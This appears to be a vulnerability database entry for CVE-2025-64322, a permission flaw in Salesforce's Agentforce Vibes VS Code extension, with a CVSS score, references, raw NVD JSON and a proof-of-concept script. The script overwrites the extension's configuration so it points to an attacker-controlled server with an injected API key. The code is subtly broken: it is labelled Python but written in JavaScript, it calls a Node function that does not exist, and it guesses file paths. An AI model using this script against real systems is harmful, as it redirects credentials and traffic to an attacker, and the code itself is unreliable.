CVE-2025-64322

Description

Incorrect Permission Assignment for Critical Resource vulnerability in Salesforce Agentforce Vibes Extension allows Manipulating Writeable Configuration Files.This issue affects Agentforce Vibes Extension: before 3.3.0.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:salesforce:agentforce_vibes:*:*:*:*:*:visual_studio_code:*:* - VULNERABLE

Salesforce Agentforce Vibes Extension < 3.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-64322 PoC - Configuration File Manipulation
// This PoC demonstrates the permission misconfiguration vulnerability

const fs = require('fs');
const path = require('path');

// Target configuration file paths (example locations)
const configPaths = [
  '~/.vibes/config.json',
  '~/.salesforce/vibes/settings.json',
  '/etc/vibes/agentforce.conf'
];

// Malicious configuration content
const maliciousConfig = {
  "api_endpoint": "https://attacker-controlled-server.com/api",
  "api_key": "malicious_key_injected",
  "allow_remote_config": true,
  "debug_mode": true
};

function exploitVulnerability() {
  console.log('[+] Starting CVE-2025-64322 exploitation');
  
  for (const configPath of configPaths) {
    const expandedPath = path.expanduser(configPath);
    
    try {
      // Check if file exists and is writable
      if (fs.existsSync(expandedPath)) {
        const stats = fs.statSync(expandedPath);
        console.log(`[*] Found config at: ${expandedPath}`);
        console.log(`[*] File permissions: ${stats.mode.toString(8)}`);
        
        // Attempt to write malicious configuration
        fs.writeFileSync(expandedPath, JSON.stringify(maliciousConfig, null, 2));
        console.log(`[+] Successfully wrote malicious config to: ${expandedPath}`);
        console.log('[+] Configuration manipulation complete - vulnerability exploited');
        return true;
      }
    } catch (error) {
      console.log(`[-] Failed to access: ${expandedPath} - ${error.message}`);
    }
  }
  
  console.log('[-] Exploitation failed - target config files not accessible');
  return false;
}

exploitVulnerability();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64322
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64322
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64322/
[4] VulDB https://vuldb.com/cve/CVE-2025-64322
[5] https://help.salesforce.com/s/articleView?id=005228032&type=1

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64322", "sourceIdentifier": "[email protected]", "published": "2025-11-04T19:17:11.887", "lastModified": "2026-02-04T19:51:14.333", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Permission Assignment for Critical Resource vulnerability in Salesforce Agentforce Vibes Extension allows Manipulating Writeable Configuration Files.This issue affects Agentforce Vibes Extension: before 3.3.0."}, {"lang": "es", "value": "La vulnerabilidad de Asignación Incorrecta de Permisos para Recurso Crítico en la Extensión Agentforce Vibes de Salesforce permite manipular archivos de configuración escribibles. Este problema afecta a la Extensión Agentforce Vibes: anterior a 3.2.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesforce:agentforce_vibes:*:*:*:*:*:visual_studio_code:*:*", "versionEndExcluding": "3.3.0", "matchCriteriaId": "966183FA-4A2A-4D2D-B117-4B60289CC657"}]}]}], "references": [{"url": "https://help.salesforce.com/s/articleView?id=005228032&type=1", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}